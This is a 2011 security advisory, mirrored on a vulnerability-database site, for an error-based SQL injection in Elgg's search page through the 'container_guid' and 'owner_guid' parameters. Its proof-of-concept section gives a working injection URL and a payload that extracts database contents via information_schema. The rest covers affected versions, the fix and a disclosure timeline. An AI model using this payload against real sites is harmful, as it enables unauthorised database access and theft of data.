Vulners
Lucene search
Elgg 1.8 beta2 SQL Injection
##################################################
Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid'
SQL Injection
Vendor URL: http://www.elgg.org/
Advisore: http://lostmon.blogspot.com/2011/08/elgg-18-beta2-and-prior-to-1711.html
Vendor notify: YES exploit available: YES
##################################################
###################
Description By vendor
###################
Elgg is an award-winning social networking engine, delivering
the building blocks that enable businesses, schools, universities
and associations to create their own fully-featured social networks
and applications. Organizations with networks powered by Elgg
include: Australian Government, British Government, Federal Canadian
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,
Johns Hopkins University and more (http://elgg.org/powering.php)
######################
Vulnerability Description
######################
Elgg contains a flaw that may allow an attacker to carry out an
SQL injection attack. The issue is due to the script not properly
sanitizing user-supplied input to 'container_guid' and 'owner_guid'
variables upon submision to 'mod/search/pages/search/index.php'
This may allow an attacker to inject or manipulate SQL queries
in the backend database.
################
Versions afected
################
Elgg 1.8 beta2 vulnerable
Elgg 1.7.10 and prior versions vulnerables
Elgg 1.7.11 not vulnerable
#################
Tecnical details
#################
Injection type is Integer and it only can be exploit via
Mysql error based injection method, it works with
'magic_quotes_gpc' set to 'on' or 'off'
######################
Proof Of Concept
######################
If you know what is error based injection... you know how to use it ;)
URL => http://localhost/elgg/search/?q=someword&search_type=tags&container_guid=7826'
Injections:
and(select 1 from(select count(*),concat((select (select %column_name%) from
`information_schema`.tables limit 0,1),floor(rand(0)*2))x from
`information_schema`.tables
group by x)a) and 1=1
Count(table_name) of information_schema.tables where
table_schema=0x74657374 is 75
Count(column_name) of information_schema.columns where
table_schema=0x74657374 and table_name=0x62616E6C697374 is 4
################
Solution
###############
The vendor has release a updated version to solve this
issue and others see changelog and update your Elgg
instalation to 1.7.11
###############
Timeline
###############
Discovered :July 30, 2011
Vendor Notify:July 30, 2011
Vendor response:July 30, 2011
Vendor Patch: August 15, 2011
Public Disclosure: August 15, 2011
########################## Ђnd ########################
Atentamente:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
# 0day.today [2018-03-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Aug 2011 00:00Current
7.1High risk
Vulners AI Score7.1